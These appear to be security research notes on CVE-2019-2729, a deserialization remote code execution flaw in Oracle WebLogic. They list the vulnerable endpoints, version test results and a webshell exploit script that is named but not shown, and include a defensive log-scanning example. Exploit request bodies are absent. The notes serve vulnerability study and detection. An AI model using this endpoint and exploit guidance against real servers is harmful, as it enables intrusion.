WebLogic - CVE-2019-2729

Oracle WebLogic server is affected by a remote code execution vulnerability in wls-wsat.war and wls9_async_response.war packages due to unsafe deserialization of Java objects. A remote unauthenticated attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.

Exploiting wls-wsat.war will return command output, while wls9_async_response.war is blind.

Affected versions: 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0

# Vulnerable endpoints

## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

## wls9_async_response.war (blind)
/_async/AsyncResponseService
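As an added example (not part of this page or of rootedshell's script), the detection logic a defender could run over WebLogic access logs: it flags POST requests to the endpoints listed above and labels which package (command-response or blind) each one targets. The combined-log-format layout and the sample lines are assumed and constructed.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Endpoints from the page: wls-wsat sinks return command output, _async is blind.
WSAT_PORTS = ("CoordinatorPortType", "RegistrationPortTypeRPC",
              "ParticipantPortType", "RegistrationRequesterPortType")
SINKS = {f"/wls-wsat/{p}{v}": "wls-wsat (cmd response)"
         for p in WSAT_PORTS for v in ("", "11")}
SINKS["/_async/AsyncResponseService"] = "wls9_async_response (blind)"

# Assumed combined-log-format access line; adapt to your WebLogic log layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

def classify(path: str) -> Optional[str]:
    """Map a request path to the vulnerable package it targets, or None."""
    base = path.split("?", 1)[0].rstrip("/")
    return SINKS.get(base)

def scan(lines: Iterable[str]) -> List[Tuple[str, str, int, str]]:
    """Return (ip, path, status, sink) for every POST to a CVE-2019-2729 endpoint.
    GETs (e.g. ?WSDL fetches) are skipped: the deserialization sink needs POSTed XML."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        sink = classify(m["path"])
        if sink:
            hits.append((m["ip"], m["path"], int(m["status"]), sink))
    return hits

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2019:12:00:01 +0000] "GET /wls-wsat/CoordinatorPortType?WSDL HTTP/1.1" 200 1532',
    '203.0.113.5 - - [10/Jun/2019:12:00:02 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 2311',
    '198.51.100.7 - - [10/Jun/2019:12:00:03 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0',
    '198.51.100.7 - - [10/Jun/2019:12:00:04 +0000] "POST /console/j_security_check HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, path, status, sink in scan(SAMPLE_LOG):
        print(f"{ip} POST {path} -> {status} via {sink}")
```

A hit on a wls-wsat path with a 500 response is worth correlating with a subsequent hit on the same path, since the blind _async variant gives no error feedback and will usually show as a 202.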

# Test data

| Version | Image | Result | Reason |
|---|---|---|---|
| 10.3.6.0 | | Vulnerable | wls-wsat deserialization |
| 12.2.1.3 | | Not vulnerable | Endpoints missing |
| 12.2.1.3 | | Not vulnerable | Endpoints missing |
| 12.2.1.3 | | Inconclusive | "Old format work area header is disabled." |

Request 01, RCE on version 10.3.6.0:

Request 02, designed for version 10.2.7.1, RCE on 10.3.6.0:

Request 03, designed for version 10.3.6.0, RCE on 10.3.6.0:

Request 04, designed for version 10.3.6.2, RCE on 10.3.6.0:

Request 05, designed for version 12.2.1.3, error "Old format work area header is disabled." on version 12.2.1.3. Not sure if this is an error caused by my container; I need more test data.

# Scripts

weblogic_get_webshell.py - runs three payloads on the target at once, by rootedshell.

As there are few public exploits using the /_async/ endpoint, I've modified rootedshell's script to only upload a webshell and allow direct command execution. The script can be found here.
